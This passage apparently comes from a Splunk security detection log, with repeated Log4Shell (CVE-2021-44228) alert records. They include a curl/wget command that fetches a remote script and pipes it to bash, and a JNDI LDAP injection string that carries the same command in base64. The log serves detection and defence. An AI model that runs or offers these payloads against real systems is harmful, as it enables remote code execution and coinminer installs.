This is typically found with coinminers and most recently with CVE-2021-44228, a vulnerability in Log4j.", threat_object="dash", threat_object_type="process", user="ubuntu" 1642641515, search_name="ESCU - Wget Download and Bash Execution - Rule", analyticstories="Ingress Tool Transfer", analyticstories="Log4Shell CVE-2021-44228", annotations="{\"analytic_story\":[\"Ingress Tool Transfer\",\"Log4Shell CVE-2021-44228\"],\"context\":[\"Source:Endpoint\",\"Stage:Defense Evasion\"],\"cve\":[\"CVE-2021-44228\"],\"kill_chain_phases\":[\"Exploitation\"],\"mitre_attack\":[\"T1105\"],\"observable\":[]}", annotations._all="Ingress Tool Transfer", annotations._all="Stage:Defense Evasion", annotations._all="Exploitation", annotations._all="Log4Shell CVE-2021-44228", annotations._all="Source:Endpoint", annotations._all="CVE-2021-44228", annotations._all="T1105", annotations._frameworks="analytic_story", annotations._frameworks="context", annotations._frameworks="cve", annotations._frameworks="kill_chain_phases", annotations._frameworks="mitre_attack", annotations.analytic_story="Ingress Tool Transfer", annotations.analytic_story="Log4Shell CVE-2021-44228", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.cve="CVE-2021-44228", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1105", count="1", dest="sysmonlinux-jhernandez-16155-1604", firstTime="1642638101", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-01-20T00:21:41", parent_process_id="7756", parent_process_name="-", process="/bin/sh -c (curl http://8.8.8.8:80/wp-content/themes/twentythirteen/m8 || wget -qO - http://8.8.8.8:80/wp-content/themes/twentythirteen/m8)|bash", process_id="8018", process_name="dash", risk_message="An instance of dash was identified on endpoint sysmonlinux-jhernandez-16155-1604 attempting to download a remote file and run it with bash.", risk_object="ubuntu", risk_object_type="user", risk_score="80.0", 
savedsearch_description="The following analytic identifies the use of wget on Linux or MacOS attempting to download a file from a remote source and pipe it to bash. This is typically found with coinminers and most recently with CVE-2021-44228, a vulnerability in Log4j.", threat_object="dash", threat_object_type="process", user="ubuntu" 1642641515, search_name="ESCU - Wget Download and Bash Execution - Rule", analyticstories="Ingress Tool Transfer", analyticstories="Log4Shell CVE-2021-44228", annotations="{\"analytic_story\":[\"Ingress Tool Transfer\",\"Log4Shell CVE-2021-44228\"],\"context\":[\"Source:Endpoint\",\"Stage:Defense Evasion\"],\"cve\":[\"CVE-2021-44228\"],\"kill_chain_phases\":[\"Exploitation\"],\"mitre_attack\":[\"T1105\"],\"observable\":[]}", annotations._all="Ingress Tool Transfer", annotations._all="Stage:Defense Evasion", annotations._all="Exploitation", annotations._all="Log4Shell CVE-2021-44228", annotations._all="Source:Endpoint", annotations._all="CVE-2021-44228", annotations._all="T1105", annotations._frameworks="analytic_story", annotations._frameworks="context", annotations._frameworks="cve", annotations._frameworks="kill_chain_phases", annotations._frameworks="mitre_attack", annotations.analytic_story="Ingress Tool Transfer", annotations.analytic_story="Log4Shell CVE-2021-44228", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.cve="CVE-2021-44228", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1105", count="1", dest="sysmonlinux-jhernandez-16155-1604", firstTime="1642633814", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-01-19T23:10:14", parent_process_id="7756", parent_process_name="-", process="/bin/sh -c (curl http://8.8.8.8:80/wp-content/themes/twentythirteen/m8 || wget -qO - http://8.8.8.8:80/wp-content/themes/twentythirteen/m8)|bash", process_id="7877", process_name="dash", risk_message="An instance of dash was identified on endpoint 
sysmonlinux-jhernandez-16155-1604 attempting to download a remote file and run it with bash.", risk_object="sysmonlinux-jhernandez-16155-1604", risk_object_type="system", risk_score="80.0", savedsearch_description="The following analytic identifies the use of wget on Linux or MacOS attempting to download a file from a remote source and pipe it to bash. This is typically found with coinminers and most recently with CVE-2021-44228, a vulnerability in Log4j.", threat_object="dash", threat_object_type="process", user="ubuntu" 1642641515, search_name="ESCU - Wget Download and Bash Execution - Rule", analyticstories="Ingress Tool Transfer", analyticstories="Log4Shell CVE-2021-44228", annotations="{\"analytic_story\":[\"Ingress Tool Transfer\",\"Log4Shell CVE-2021-44228\"],\"context\":[\"Source:Endpoint\",\"Stage:Defense Evasion\"],\"cve\":[\"CVE-2021-44228\"],\"kill_chain_phases\":[\"Exploitation\"],\"mitre_attack\":[\"T1105\"],\"observable\":[]}", annotations._all="Ingress Tool Transfer", annotations._all="Stage:Defense Evasion", annotations._all="Exploitation", annotations._all="Log4Shell CVE-2021-44228", annotations._all="Source:Endpoint", annotations._all="CVE-2021-44228", annotations._all="T1105", annotations._frameworks="analytic_story", annotations._frameworks="context", annotations._frameworks="cve", annotations._frameworks="kill_chain_phases", annotations._frameworks="mitre_attack", annotations.analytic_story="Ingress Tool Transfer", annotations.analytic_story="Log4Shell CVE-2021-44228", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.cve="CVE-2021-44228", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1105", count="1", dest="sysmonlinux-jhernandez-16155-1604", firstTime="1642633814", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-01-19T23:10:14", parent_process_id="7756", parent_process_name="-", process="/bin/sh -c (curl 
http://8.8.8.8:80/wp-content/themes/twentythirteen/m8 || wget -qO - http://8.8.8.8:80/wp-content/themes/twentythirteen/m8)|bash", process_id="7877", process_name="dash", risk_message="An instance of dash was identified on endpoint sysmonlinux-jhernandez-16155-1604 attempting to download a remote file and run it with bash.", risk_object="ubuntu", risk_object_type="user", risk_score="80.0", savedsearch_description="The following analytic identifies the use of wget on Linux or MacOS attempting to download a file from a remote source and pipe it to bash. This is typically found with coinminers and most recently with CVE-2021-44228, a vulnerability in Log4j.", threat_object="dash", threat_object_type="process", user="ubuntu" 1642641515, search_name="ESCU - Wget Download and Bash Execution - Rule", analyticstories="Ingress Tool Transfer", analyticstories="Log4Shell CVE-2021-44228", annotations="{\"analytic_story\":[\"Ingress Tool Transfer\",\"Log4Shell CVE-2021-44228\"],\"context\":[\"Source:Endpoint\",\"Stage:Defense Evasion\"],\"cve\":[\"CVE-2021-44228\"],\"kill_chain_phases\":[\"Exploitation\"],\"mitre_attack\":[\"T1105\"],\"observable\":[]}", annotations._all="Ingress Tool Transfer", annotations._all="Stage:Defense Evasion", annotations._all="Exploitation", annotations._all="Log4Shell CVE-2021-44228", annotations._all="Source:Endpoint", annotations._all="CVE-2021-44228", annotations._all="T1105", annotations._frameworks="analytic_story", annotations._frameworks="context", annotations._frameworks="cve", annotations._frameworks="kill_chain_phases", annotations._frameworks="mitre_attack", annotations.analytic_story="Ingress Tool Transfer", annotations.analytic_story="Log4Shell CVE-2021-44228", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.cve="CVE-2021-44228", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1105", count="1", dest="sysmonlinux-jhernandez-16155-1604", firstTime="1642633812", 
info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-01-19T23:10:12", parent_process_id="7756", parent_process_name="-", process="/bin/sh -c (curl http://8.8.8.8:80/wp-content/themes/twentythirteen/m8 || wget -qO - http://8.8.8.8:80/wp-content/themes/twentythirteen/m8)|bash", process_id="7870", process_name="dash", risk_message="An instance of dash was identified on endpoint sysmonlinux-jhernandez-16155-1604 attempting to download a remote file and run it with bash.", risk_object="sysmonlinux-jhernandez-16155-1604", risk_object_type="system", risk_score="80.0", savedsearch_description="The following analytic identifies the use of wget on Linux or MacOS attempting to download a file from a remote source and pipe it to bash. This is typically found with coinminers and most recently with CVE-2021-44228, a vulnerability in Log4j.", threat_object="dash", threat_object_type="process", user="ubuntu" 1642641515, search_name="ESCU - Wget Download and Bash Execution - Rule", analyticstories="Ingress Tool Transfer", analyticstories="Log4Shell CVE-2021-44228", annotations="{\"analytic_story\":[\"Ingress Tool Transfer\",\"Log4Shell CVE-2021-44228\"],\"context\":[\"Source:Endpoint\",\"Stage:Defense Evasion\"],\"cve\":[\"CVE-2021-44228\"],\"kill_chain_phases\":[\"Exploitation\"],\"mitre_attack\":[\"T1105\"],\"observable\":[]}", annotations._all="Ingress Tool Transfer", annotations._all="Stage:Defense Evasion", annotations._all="Exploitation", annotations._all="Log4Shell CVE-2021-44228", annotations._all="Source:Endpoint", annotations._all="CVE-2021-44228", annotations._all="T1105", annotations._frameworks="analytic_story", annotations._frameworks="context", annotations._frameworks="cve", annotations._frameworks="kill_chain_phases", annotations._frameworks="mitre_attack", annotations.analytic_story="Ingress Tool Transfer", annotations.analytic_story="Log4Shell CVE-2021-44228", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", 
annotations.cve="CVE-2021-44228", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1105", count="1", dest="sysmonlinux-jhernandez-16155-1604", firstTime="1642633812", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-01-19T23:10:12", parent_process_id="7756", parent_process_name="-", process="/bin/sh -c (curl http://8.8.8.8:80/wp-content/themes/twentythirteen/m8 || wget -qO - http://8.8.8.8:80/wp-content/themes/twentythirteen/m8)|bash", process_id="7870", process_name="dash", risk_message="An instance of dash was identified on endpoint sysmonlinux-jhernandez-16155-1604 attempting to download a remote file and run it with bash.", risk_object="ubuntu", risk_object_type="user", risk_score="80.0", savedsearch_description="The following analytic identifies the use of wget on Linux or MacOS attempting to download a file from a remote source and pipe it to bash. This is typically found with coinminers and most recently with CVE-2021-44228, a vulnerability in Log4j.", threat_object="dash", threat_object_type="process", user="ubuntu" 1642641515, search_name="ESCU - Wget Download and Bash Execution - Rule", analyticstories="Ingress Tool Transfer", analyticstories="Log4Shell CVE-2021-44228", annotations="{\"analytic_story\":[\"Ingress Tool Transfer\",\"Log4Shell CVE-2021-44228\"],\"context\":[\"Source:Endpoint\",\"Stage:Defense Evasion\"],\"cve\":[\"CVE-2021-44228\"],\"kill_chain_phases\":[\"Exploitation\"],\"mitre_attack\":[\"T1105\"],\"observable\":[]}", annotations._all="Ingress Tool Transfer", annotations._all="Stage:Defense Evasion", annotations._all="Exploitation", annotations._all="Log4Shell CVE-2021-44228", annotations._all="Source:Endpoint", annotations._all="CVE-2021-44228", annotations._all="T1105", annotations._frameworks="analytic_story", annotations._frameworks="context", annotations._frameworks="cve", annotations._frameworks="kill_chain_phases", annotations._frameworks="mitre_attack", annotations.analytic_story="Ingress 
Tool Transfer", annotations.analytic_story="Log4Shell CVE-2021-44228", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.cve="CVE-2021-44228", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1105", count="1", dest="sysmonlinux-jhernandez-16155-1604", firstTime="1642631700", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-01-19T22:35:00", parent_process_id="7756", parent_process_name="-", process="/bin/sh -c (curl http://8.8.8.8:80/wp-content/themes/twentythirteen/m8 || wget -qO - http://8.8.8.8:80/wp-content/themes/twentythirteen/m8)|bash", process_id="7798", process_name="dash", risk_message="An instance of dash was identified on endpoint sysmonlinux-jhernandez-16155-1604 attempting to download a remote file and run it with bash.", risk_object="sysmonlinux-jhernandez-16155-1604", risk_object_type="system", risk_score="80.0", savedsearch_description="The following analytic identifies the use of wget on Linux or MacOS attempting to download a file from a remote source and pipe it to bash. 
This is typically found with coinminers and most recently with CVE-2021-44228, a vulnerability in Log4j.", threat_object="dash", threat_object_type="process", user="ubuntu" 1642641515, search_name="ESCU - Wget Download and Bash Execution - Rule", analyticstories="Ingress Tool Transfer", analyticstories="Log4Shell CVE-2021-44228", annotations="{\"analytic_story\":[\"Ingress Tool Transfer\",\"Log4Shell CVE-2021-44228\"],\"context\":[\"Source:Endpoint\",\"Stage:Defense Evasion\"],\"cve\":[\"CVE-2021-44228\"],\"kill_chain_phases\":[\"Exploitation\"],\"mitre_attack\":[\"T1105\"],\"observable\":[]}", annotations._all="Ingress Tool Transfer", annotations._all="Stage:Defense Evasion", annotations._all="Exploitation", annotations._all="Log4Shell CVE-2021-44228", annotations._all="Source:Endpoint", annotations._all="CVE-2021-44228", annotations._all="T1105", annotations._frameworks="analytic_story", annotations._frameworks="context", annotations._frameworks="cve", annotations._frameworks="kill_chain_phases", annotations._frameworks="mitre_attack", annotations.analytic_story="Ingress Tool Transfer", annotations.analytic_story="Log4Shell CVE-2021-44228", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.cve="CVE-2021-44228", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1105", count="1", dest="sysmonlinux-jhernandez-16155-1604", firstTime="1642631700", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-01-19T22:35:00", parent_process_id="7756", parent_process_name="-", process="/bin/sh -c (curl http://8.8.8.8:80/wp-content/themes/twentythirteen/m8 || wget -qO - http://8.8.8.8:80/wp-content/themes/twentythirteen/m8)|bash", process_id="7798", process_name="dash", risk_message="An instance of dash was identified on endpoint sysmonlinux-jhernandez-16155-1604 attempting to download a remote file and run it with bash.", risk_object="ubuntu", risk_object_type="user", risk_score="80.0", 
savedsearch_description="The following analytic identifies the use of wget on Linux or MacOS attempting to download a file from a remote source and pipe it to bash. This is typically found with coinminers and most recently with CVE-2021-44228, a vulnerability in Log4j.", threat_object="dash", threat_object_type="process", user="ubuntu" 1642641255, search_name="ESCU - Detect Outbound LDAP Traffic - Rule", analyticstories="Log4Shell CVE-2021-44228", annotations="{\"analytic_story\":[\"Log4Shell CVE-2021-44228\"],\"cis20\":[\"CIS 12\",\"CIS 13\"],\"context\":[\"Source:Endpoint\",\"Stage:Initial Access\"],\"cve\":[\"CVE-2021-44228\"],\"kill_chain_phases\":[\"Command and Control\",\"Actions on Objectives\"],\"mitre_attack\":[\"T1190\",\"T1059\"],\"nist\":[\"PR.DS\",\"PR.PT\",\"DE.AE\",\"DE.CM\"],\"observable\":[]}", annotations._all="Actions on Objectives", annotations._all="CIS 13", annotations._all="T1190", annotations._all="PR.DS", annotations._all="Command and Control", annotations._all="Source:Endpoint", annotations._all="CVE-2021-44228", annotations._all="DE.AE", annotations._all="Stage:Initial Access", annotations._all="CIS 12", annotations._all="Log4Shell CVE-2021-44228", annotations._all="DE.CM", annotations._all="PR.PT", annotations._all="T1059", annotations._frameworks="analytic_story", annotations._frameworks="cis20", annotations._frameworks="context", annotations._frameworks="cve", annotations._frameworks="kill_chain_phases", annotations._frameworks="mitre_attack", annotations._frameworks="nist", annotations.analytic_story="Log4Shell CVE-2021-44228", annotations.cis20="CIS 12", annotations.cis20="CIS 13", annotations.context="Source:Endpoint", annotations.context="Stage:Initial Access", annotations.cve="CVE-2021-44228", annotations.kill_chain_phases="Command and Control", annotations.kill_chain_phases="Actions on Objectives", annotations.mitre_attack="T1190", annotations.mitre_attack="T1059", annotations.nist="PR.DS", annotations.nist="PR.PT", 
annotations.nist="DE.AE", annotations.nist="DE.CM", dest_ip="0:0:0:0:0:ffff:a00:110", earliest_time="2022-01-19T22:34:59", info_max_time="+Infinity", info_min_time="0.000", latest_time="2022-01-20T00:21:41", risk_message="An outbound LDAP connection from 0:0:0:0:0:ffff:a00:114 in your infrastructure connecting to dest ip 0:0:0:0:0:ffff:a00:110", risk_object="0:0:0:0:0:ffff:a00:110", risk_object_type="system", risk_score="56.0", savedsearch_description="Malicious actors often abuse misconfigured LDAP servers or applications that use the LDAP servers in organizations. Outbound LDAP traffic should not be allowed outbound through your perimeter firewall. This search will help determine if you have any LDAP connections to IP addresses outside of private (RFC1918) address space.", src_ip="0:0:0:0:0:ffff:a00:114" 1642641255, search_name="ESCU - Detect Outbound LDAP Traffic - Rule", analyticstories="Log4Shell CVE-2021-44228", annotations="{\"analytic_story\":[\"Log4Shell CVE-2021-44228\"],\"cis20\":[\"CIS 12\",\"CIS 13\"],\"context\":[\"Source:Endpoint\",\"Stage:Initial Access\"],\"cve\":[\"CVE-2021-44228\"],\"kill_chain_phases\":[\"Command and Control\",\"Actions on Objectives\"],\"mitre_attack\":[\"T1190\",\"T1059\"],\"nist\":[\"PR.DS\",\"PR.PT\",\"DE.AE\",\"DE.CM\"],\"observable\":[]}", annotations._all="Actions on Objectives", annotations._all="CIS 13", annotations._all="T1190", annotations._all="PR.DS", annotations._all="Command and Control", annotations._all="Source:Endpoint", annotations._all="CVE-2021-44228", annotations._all="DE.AE", annotations._all="Stage:Initial Access", annotations._all="CIS 12", annotations._all="Log4Shell CVE-2021-44228", annotations._all="DE.CM", annotations._all="PR.PT", annotations._all="T1059", annotations._frameworks="analytic_story", annotations._frameworks="cis20", annotations._frameworks="context", annotations._frameworks="cve", annotations._frameworks="kill_chain_phases", annotations._frameworks="mitre_attack", 
annotations._frameworks="nist", annotations.analytic_story="Log4Shell CVE-2021-44228", annotations.cis20="CIS 12", annotations.cis20="CIS 13", annotations.context="Source:Endpoint", annotations.context="Stage:Initial Access", annotations.cve="CVE-2021-44228", annotations.kill_chain_phases="Command and Control", annotations.kill_chain_phases="Actions on Objectives", annotations.mitre_attack="T1190", annotations.mitre_attack="T1059", annotations.nist="PR.DS", annotations.nist="PR.PT", annotations.nist="DE.AE", annotations.nist="DE.CM", dest_ip="0:0:0:0:0:ffff:a00:110", earliest_time="2022-01-19T22:34:59", info_max_time="+Infinity", info_min_time="0.000", latest_time="2022-01-20T00:21:41", risk_message="An outbound LDAP connection from 0:0:0:0:0:ffff:a00:114 in your infrastructure connecting to dest ip 0:0:0:0:0:ffff:a00:110", risk_object="0:0:0:0:0:ffff:a00:114", risk_object_type="system", risk_score="56.0", savedsearch_description="Malicious actors often abuse misconfigured LDAP servers or applications that use the LDAP servers in organizations. Outbound LDAP traffic should not be allowed outbound through your perimeter firewall. 
This search will help determine if you have any LDAP connections to IP addresses outside of private (RFC1918) address space.", src_ip="0:0:0:0:0:ffff:a00:114" 1642641251, search_name="ESCU - Log4Shell JNDI Payload Injection Attempt - Rule", action="Bad Request", analyticstories="Log4Shell CVE-2021-44228", annotations="{\"analytic_story\":[\"Log4Shell CVE-2021-44228\"],\"cis20\":[\"CIS 3\",\"CIS 5\",\"CIS 16\"],\"context\":[\"Source:Application Log\",\"Stage:Execution\"],\"cve\":[\"CVE-2021-44228\"],\"kill_chain_phases\":[\"Reconnaissance\",\"Exploitation\"],\"mitre_attack\":[\"T1190\"],\"nist\":[\"DE.CM\"],\"observable\":[]}", annotations._all="Exploitation", annotations._all="Source:Application Log", annotations._all="CIS 16", annotations._all="Reconnaissance", annotations._all="Log4Shell CVE-2021-44228", annotations._all="Stage:Execution", annotations._all="DE.CM", annotations._all="CIS 5", annotations._all="CVE-2021-44228", annotations._all="CIS 3", annotations._all="T1190", annotations._frameworks="analytic_story", annotations._frameworks="cis20", annotations._frameworks="context", annotations._frameworks="cve", annotations._frameworks="kill_chain_phases", annotations._frameworks="mitre_attack", annotations._frameworks="nist", annotations.analytic_story="Log4Shell CVE-2021-44228", annotations.cis20="CIS 3", annotations.cis20="CIS 5", annotations.cis20="CIS 16", annotations.context="Source:Application Log", annotations.context="Stage:Execution", annotations.cve="CVE-2021-44228", annotations.kill_chain_phases="Reconnaissance", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1190", annotations.nist="DE.CM", category="application/json", count="2", dest="10.0.1.21", dest_port="80", http_content_type="application/json", http_method="GET", http_referrer="unknown", http_user_agent="curl/7.79.1", info_max_time="+Infinity", info_min_time="0.000", risk_message="CVE-2021-44228 Log4Shell triggered for host 10.0.1.21", risk_object="10.0.1.21", 
risk_object_type="system", risk_score="15.0", savedsearch_description="CVE-2021-44228 Log4Shell payloads can be injected via various methods, but one of the most common injection vectors is via Web calls. Many of the vulnerable java web applications that are using log4j have a web component to them and are especially targets of this injection, specifically projects like Apache Struts, Flink, Druid, and Solr. The exploit is triggered by an LDAP lookup function in the log4j package, its invocation is similar to `${jndi:ldap://PAYLOAD_INJECTED}`, when executed against vulnerable web applications the invocation can be seen in various parts of web logs. Specifically it has been successfully exploited via headers like X-Forwarded-For, User-Agent, Referer, and X-Api-Version. In this detection we first limit the scope of our search to the Web Datamodel and use the `| from datamodel` function to benefit from schema accelerated searching capabilities, mainly because the second part of the detection is pretty heavy, it runs a regex across all _raw events that looks for the `${jndi:ldap://` pattern across all potential web fields available to the raw data, like http headers for example. 
If you see results for this detection, it means that there was an attempt at an injection, which could be a reconnaissance activity or a valid exploitation attempt, but this does not necessarily mean that the host was indeed successfully exploited.", site="localhost", src="${jndi:ldap://10.0.1.16:1389/Basic/Command/Base64/KGN1cmwgaHR0cDovLzguOC44Ljg6ODAvd3AtY29udGVudC90aGVtZXMvdHdlbnR5dGhpcnRlZW4vbTggfHwgd2dldCAtcU8gLSBodHRwOi8vOC44LjguODo4MC93cC1jb250ZW50L3RoZW1lcy90d2VudHl0aGlydGVlbi9tOCl8YmFzaA==}", url="http://10.0.1.21:80/", url_domain="10.0.1.21", user="unknown" 1642641251, search_name="ESCU - Log4Shell JNDI Payload Injection Attempt - Rule", action="Bad Request", analyticstories="Log4Shell CVE-2021-44228", annotations="{\"analytic_story\":[\"Log4Shell CVE-2021-44228\"],\"cis20\":[\"CIS 3\",\"CIS 5\",\"CIS 16\"],\"context\":[\"Source:Application Log\",\"Stage:Execution\"],\"cve\":[\"CVE-2021-44228\"],\"kill_chain_phases\":[\"Reconnaissance\",\"Exploitation\"],\"mitre_attack\":[\"T1190\"],\"nist\":[\"DE.CM\"],\"observable\":[]}", annotations._all="Exploitation", annotations._all="Source:Application Log", annotations._all="CIS 16", annotations._all="Reconnaissance", annotations._all="Log4Shell CVE-2021-44228", annotations._all="Stage:Execution", annotations._all="DE.CM", annotations._all="CIS 5", annotations._all="CVE-2021-44228", annotations._all="CIS 3", annotations._all="T1190", annotations._frameworks="analytic_story", annotations._frameworks="cis20", annotations._frameworks="context", annotations._frameworks="cve", annotations._frameworks="kill_chain_phases", annotations._frameworks="mitre_attack", annotations._frameworks="nist", annotations.analytic_story="Log4Shell CVE-2021-44228", annotations.cis20="CIS 3", annotations.cis20="CIS 5", annotations.cis20="CIS 16", annotations.context="Source:Application Log", annotations.context="Stage:Execution", annotations.cve="CVE-2021-44228", annotations.kill_chain_phases="Reconnaissance", 
annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1190", annotations.nist="DE.CM", category="application/json", count="2", dest="10.0.1.21", dest_port="80", http_content_type="application/json", http_method="GET", http_referrer="unknown", http_user_agent="curl/7.79.1", info_max_time="+Infinity", info_min_time="0.000", risk_message="CVE-2021-44228 Log4Shell triggered for host 10.0.1.21", risk_object="unknown", risk_object_type="user", risk_score="15.0", savedsearch_description="CVE-2021-44228 Log4Shell payloads can be injected via various methods, but one of the most common injection vectors is via Web calls. Many of the vulnerable java web applications that are using log4j have a web component to them and are especially targets of this injection, specifically projects like Apache Struts, Flink, Druid, and Solr. The exploit is triggered by an LDAP lookup function in the log4j package, its invocation is similar to `${jndi:ldap://PAYLOAD_INJECTED}`, when executed against vulnerable web applications the invocation can be seen in various parts of web logs. Specifically it has been successfully exploited via headers like X-Forwarded-For, User-Agent, Referer, and X-Api-Version. In this detection we first limit the scope of our search to the Web Datamodel and use the `| from datamodel` function to benefit from schema accelerated searching capabilities, mainly because the second part of the detection is pretty heavy, it runs a regex across all _raw events that looks for the `${jndi:ldap://` pattern across all potential web fields available to the raw data, like http headers for example. 
If you see results for this detection, it means that there was an attempt at an injection, which could be a reconnaissance activity or a valid exploitation attempt, but this does not necessarily mean that the host was indeed successfully exploited.", site="localhost", src="${jndi:ldap://10.0.1.16:1389/Basic/Command/Base64/KGN1cmwgaHR0cDovLzguOC44Ljg6ODAvd3AtY29udGVudC90aGVtZXMvdHdlbnR5dGhpcnRlZW4vbTggfHwgd2dldCAtcU8gLSBodHRwOi8vOC44LjguODo4MC93cC1jb250ZW50L3RoZW1lcy90d2VudHl0aGlydGVlbi9tOCl8YmFzaA==}", url="http://10.0.1.21:80/", url_domain="10.0.1.21", user="unknown" 1642641216, search_name="ESCU - Wget Download and Bash Execution - Rule", analyticstories="Ingress Tool Transfer", analyticstories="Log4Shell CVE-2021-44228", annotations="{\"analytic_story\":[\"Ingress Tool Transfer\",\"Log4Shell CVE-2021-44228\"],\"context\":[\"Source:Endpoint\",\"Stage:Defense Evasion\"],\"cve\":[\"CVE-2021-44228\"],\"kill_chain_phases\":[\"Exploitation\"],\"mitre_attack\":[\"T1105\"],\"observable\":[]}", annotations._all="Stage:Defense Evasion", annotations._all="Exploitation", annotations._all="Log4Shell CVE-2021-44228", annotations._all="T1105", annotations._all="Ingress Tool Transfer", annotations._all="Source:Endpoint", annotations._all="CVE-2021-44228", annotations._frameworks="analytic_story", annotations._frameworks="context", annotations._frameworks="cve", annotations._frameworks="kill_chain_phases", annotations._frameworks="mitre_attack", annotations.analytic_story="Ingress Tool Transfer", annotations.analytic_story="Log4Shell CVE-2021-44228", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.cve="CVE-2021-44228", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1105", count="1", dest="sysmonlinux-jhernandez-16155-1604", firstTime="1642638231", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-01-20T00:23:51", parent_process_id="8018", parent_process_name="dash", process="wget -qO - 
http://8.8.8.8:80/wp-content/themes/twentythirteen/m8", process_id="8020", process_name="wget", risk_message="An instance of wget was identified on endpoint sysmonlinux-jhernandez-16155-1604 attempting to download a remote file and run it with bash.", risk_object="sysmonlinux-jhernandez-16155-1604", risk_object_type="system", risk_score="80.0", savedsearch_description="The following analytic identifies the use of wget on Linux or MacOS attempting to download a file from a remote source and pipe it to bash. This is typically found with coinminers and most recently with CVE-2021-44228, a vulnerability in Log4j.", threat_object="wget", threat_object_type="process", user="ubuntu" 1642641216, search_name="ESCU - Wget Download and Bash Execution - Rule", analyticstories="Ingress Tool Transfer", analyticstories="Log4Shell CVE-2021-44228", annotations="{\"analytic_story\":[\"Ingress Tool Transfer\",\"Log4Shell CVE-2021-44228\"],\"context\":[\"Source:Endpoint\",\"Stage:Defense Evasion\"],\"cve\":[\"CVE-2021-44228\"],\"kill_chain_phases\":[\"Exploitation\"],\"mitre_attack\":[\"T1105\"],\"observable\":[]}", annotations._all="Stage:Defense Evasion", annotations._all="Exploitation", annotations._all="Log4Shell CVE-2021-44228", annotations._all="T1105", annotations._all="Ingress Tool Transfer", annotations._all="Source:Endpoint", annotations._all="CVE-2021-44228", annotations._frameworks="analytic_story", annotations._frameworks="context", annotations._frameworks="cve", annotations._frameworks="kill_chain_phases", annotations._frameworks="mitre_attack", annotations.analytic_story="Ingress Tool Transfer", annotations.analytic_story="Log4Shell CVE-2021-44228", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.cve="CVE-2021-44228", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1105", count="1", dest="sysmonlinux-jhernandez-16155-1604", firstTime="1642638231", info_max_time="+Infinity", info_min_time="0.000", 
lastTime="2022-01-20T00:23:51", parent_process_id="8018", parent_process_name="dash", process="wget -qO - http://8.8.8.8:80/wp-content/themes/twentythirteen/m8", process_id="8020", process_name="wget", risk_message="An instance of wget was identified on endpoint sysmonlinux-jhernandez-16155-1604 attempting to download a remote file and run it with bash.", risk_object="ubuntu", risk_object_type="user", risk_score="80.0", savedsearch_description="The following analytic identifies the use of wget on Linux or MacOS attempting to download a file from a remote source and pipe it to bash. This is typically found with coinminers and most recently with CVE-2021-44228, a vulnerability in Log4j.", threat_object="wget", threat_object_type="process", user="ubuntu" 1642641216, search_name="ESCU - Wget Download and Bash Execution - Rule", analyticstories="Ingress Tool Transfer", analyticstories="Log4Shell CVE-2021-44228", annotations="{\"analytic_story\":[\"Ingress Tool Transfer\",\"Log4Shell CVE-2021-44228\"],\"context\":[\"Source:Endpoint\",\"Stage:Defense Evasion\"],\"cve\":[\"CVE-2021-44228\"],\"kill_chain_phases\":[\"Exploitation\"],\"mitre_attack\":[\"T1105\"],\"observable\":[]}", annotations._all="Stage:Defense Evasion", annotations._all="Exploitation", annotations._all="Log4Shell CVE-2021-44228", annotations._all="T1105", annotations._all="Ingress Tool Transfer", annotations._all="Source:Endpoint", annotations._all="CVE-2021-44228", annotations._frameworks="analytic_story", annotations._frameworks="context", annotations._frameworks="cve", annotations._frameworks="kill_chain_phases", annotations._frameworks="mitre_attack", annotations.analytic_story="Ingress Tool Transfer", annotations.analytic_story="Log4Shell CVE-2021-44228", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.cve="CVE-2021-44228", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1105", count="1", 
dest="sysmonlinux-jhernandez-16155-1604", firstTime="1642633944", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-01-19T23:12:24", parent_process_id="7877", parent_process_name="dash", process="wget -qO - http://8.8.8.8:80/wp-content/themes/twentythirteen/m8", process_id="7879", process_name="wget", risk_message="An instance of wget was identified on endpoint sysmonlinux-jhernandez-16155-1604 attempting to download a remote file and run it with bash.", risk_object="sysmonlinux-jhernandez-16155-1604", risk_object_type="system", risk_score="80.0", savedsearch_description="The following analytic identifies the use of wget on Linux or MacOS attempting to download a file from a remote source and pipe it to bash. This is typically found with coinminers and most recently with CVE-2021-44228, a vulnerability in Log4j.", threat_object="wget", threat_object_type="process", user="ubuntu" 1642641216, search_name="ESCU - Wget Download and Bash Execution - Rule", analyticstories="Ingress Tool Transfer", analyticstories="Log4Shell CVE-2021-44228", annotations="{\"analytic_story\":[\"Ingress Tool Transfer\",\"Log4Shell CVE-2021-44228\"],\"context\":[\"Source:Endpoint\",\"Stage:Defense Evasion\"],\"cve\":[\"CVE-2021-44228\"],\"kill_chain_phases\":[\"Exploitation\"],\"mitre_attack\":[\"T1105\"],\"observable\":[]}", annotations._all="Stage:Defense Evasion", 